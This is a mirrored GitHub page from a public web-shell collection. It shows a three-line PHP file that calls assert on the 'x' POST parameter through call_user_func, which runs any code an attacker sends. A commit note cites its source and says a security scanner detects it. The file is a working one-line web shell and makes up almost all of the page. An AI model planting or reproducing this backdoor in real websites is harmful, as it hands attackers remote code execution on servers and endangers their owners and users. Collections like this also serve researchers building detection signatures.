mirror of
https://github.com/tennc/webshell
synced 2024-11-13 23:17:10 +00:00
a700c2b3d8
from : https://www.sqlsec.com/2020/07/shell.html killled by safedog
3 lines
51 B
PHP
3 lines
51 B
PHP
<?php
|
|
call_user_func('assert',$_POST['x']);
|
|
?>
|